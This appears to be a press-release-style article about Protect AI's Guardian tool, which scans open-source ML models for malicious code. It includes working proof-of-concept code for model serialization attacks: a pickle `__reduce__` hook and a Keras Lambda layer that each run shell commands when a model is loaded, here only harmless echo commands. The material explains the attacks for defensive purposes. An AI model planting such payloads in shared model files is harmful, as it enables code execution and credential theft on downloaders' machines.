Protect AI Launches Guardian to Safeguard Machine Learning Models from Malicious Code

In this post:

  • Protect AI’s Guardian protects AI models, data, and systems from malware.
  • It scans open-source models for hidden threats, ensuring secure AI use.
  • Guardian offers control and security with easy integration into existing setups.

Protect AI, a leading player in AI security, has unveiled its latest innovation, Guardian. This cutting-edge solution empowers organizations to enforce robust security policies on their machine learning models, ensuring malicious code does not infiltrate their AI environments. 

Built on Protect AI’s open-source tool ModelScan, Guardian pairs those open-source capabilities with proprietary scanning functionality, providing comprehensive model security for enterprises.

Addressing the risks of democratized AI/ML

The democratization of artificial intelligence and machine learning has led to the widespread availability of foundational models on platforms like Hugging Face. These models, downloaded by millions of users every month, play a crucial role in powering a wide range of AI applications. 

However, this accessibility has also introduced security vulnerabilities, as the open exchange of files on these repositories can inadvertently facilitate the dissemination of malicious software among users.
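To make the risk concrete, here is a minimal sketch of the typical download-and-load flow; the repository and file names are placeholders, not a known malicious model, and the comments mark where a tampered file would execute.

```python
from huggingface_hub import hf_hub_download
import torch

# Placeholder repo and filename for illustration; hf_hub_download
# fetches a single file from a Hugging Face repository.
path = hf_hub_download(repo_id="some-org/some-model",
                       filename="pytorch_model.bin")

# torch.load uses pickle under the hood, so any code embedded in the
# file at serialization time runs here, on the downloader's machine.
# Newer PyTorch versions offer weights_only=True to restrict this.
state_dict = torch.load(path)
```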

Ian Swanson, CEO of Protect AI, stated, “Machine learning models have become integral assets in an organization’s infrastructure, yet they often lack the rigorous virus and malicious code scans that other file types receive before use. With thousands of models downloaded millions of times from platforms like Hugging Face each month, the potential for dangerous code to infiltrate is significant. Guardian empowers customers to regain control over the security of open-source models.”

Guardian: Protecting against model serialization attacks

One of the critical risks associated with openly shared machine learning models is the Model Serialization attack. This occurs when malicious code is injected into a model during serialization (saving) and before distribution, creating a modern version of the Trojan Horse. 

Once embedded within a model, this concealed malicious code can be executed to steal sensitive data, compromise credentials, manipulate data, and more. These risks are prevalent in models hosted on large repositories like Hugging Face.
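The mechanics are straightforward with Python’s pickle format, which many model files use under the hood. The sketch below, with a deliberately harmless payload, shows how a `__reduce__` hook turns merely loading a file into code execution:

```python
import os
import pickle


class TrojanedWeights:
    # pickle calls __reduce__ to learn how to reconstruct an object;
    # returning (callable, args) means the callable runs at load time.
    def __reduce__(self):
        # Harmless stand-in for an attacker's command, which could just
        # as easily exfiltrate credentials or fetch a second stage.
        return (os.system, ("echo pwned at model load time",))


# The attacker "saves" the model and uploads it to a public repository.
with open("model.pkl", "wb") as f:
    pickle.dump(TrojanedWeights(), f)

# The victim merely loads it; no attribute access or call is needed.
with open("model.pkl", "rb") as f:
    pickle.load(f)  # prints: pwned at model load time
```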

Protect AI previously launched ModelScan, an open-source tool designed to scan AI/ML models for potential attacks, safeguarding systems against supply chain vulnerabilities. Since its inception, Protect AI has utilized ModelScan to assess over 400,000 models hosted on Hugging Face, identifying models with security flaws and continuously updating this knowledge base.

To date, more than 3,300 models have been found capable of executing rogue code, and they continue to be downloaded and deployed in ML environments that lack security measures to scan models for risks before adoption.
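ModelScan is distributed on PyPI and is typically run from the command line against a model file or directory. A hedged sketch of wiring it into a pre-deployment check might look like the following; the CLI flags and the exit-code convention are assumptions that may vary by version:

```python
import subprocess

# Gate deployment on a clean ModelScan report. Assumes
# `pip install modelscan` has been run; flags may differ by version.
result = subprocess.run(
    ["modelscan", "-p", "downloads/pytorch_model.bin"],
    capture_output=True,
    text=True,
)
print(result.stdout)

# Like most scanners, ModelScan is assumed here to signal findings via
# a non-zero exit code; treat anything non-zero as a blocked artifact.
if result.returncode != 0:
    raise RuntimeError("ModelScan reported issues; refusing to deploy")
```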

Guardian: The secure gateway to model development and deployment

Unlike open-source alternatives, Protect AI’s Guardian acts as a secure gateway, bridging the gap between ML development and deployment processes that rely on Hugging Face and other model repositories. 

Guardian employs proprietary vulnerability scanners, including a specialized scanner for Keras lambda layers, to proactively inspect open-source models for malicious code, ensuring that only secure, policy-compliant models enter organizational networks.
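The Keras case illustrates why a dedicated scanner is needed: a Lambda layer wraps an arbitrary Python function whose bytecode is serialized inside the saved model and re-executed when the model graph is rebuilt. Below is a minimal sketch of this attack surface with a harmless payload; exact save/load behavior varies by Keras version, and Keras 3’s safe_mode blocks this path by default.

```python
import tensorflow as tf


def fake_preprocessing(x):
    # Runs whenever the layer is traced or called, including while the
    # model graph is rebuilt during loading on the victim's machine.
    import os
    os.system("echo lambda layer payload executed")
    return x  # pass data through so the model still behaves normally


inputs = tf.keras.Input(shape=(4,))
hidden = tf.keras.layers.Lambda(fake_preprocessing)(inputs)
outputs = tf.keras.layers.Dense(1)(hidden)
model = tf.keras.Model(inputs, outputs)

# The function's bytecode is marshaled into the artifact itself.
model.save("trojaned_model.h5")

# Victim side: rebuilding the graph re-executes the embedded function.
# Keras 3 refuses to do this unless safe_mode=False is passed.
loaded = tf.keras.models.load_model("trojaned_model.h5")
```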

Enhanced access control and comprehensive insights

Guardian offers advanced access control features and intuitive dashboards that grant security teams complete control over model entry while providing comprehensive insights into model origins, creators, and licensing. This level of transparency ensures organizations can make informed decisions about the models they incorporate into their AI environments.

Additionally, Guardian integrates with existing security frameworks and complements Protect AI’s Radar, offering extensive threat surface visibility for AI and machine learning within organizations.
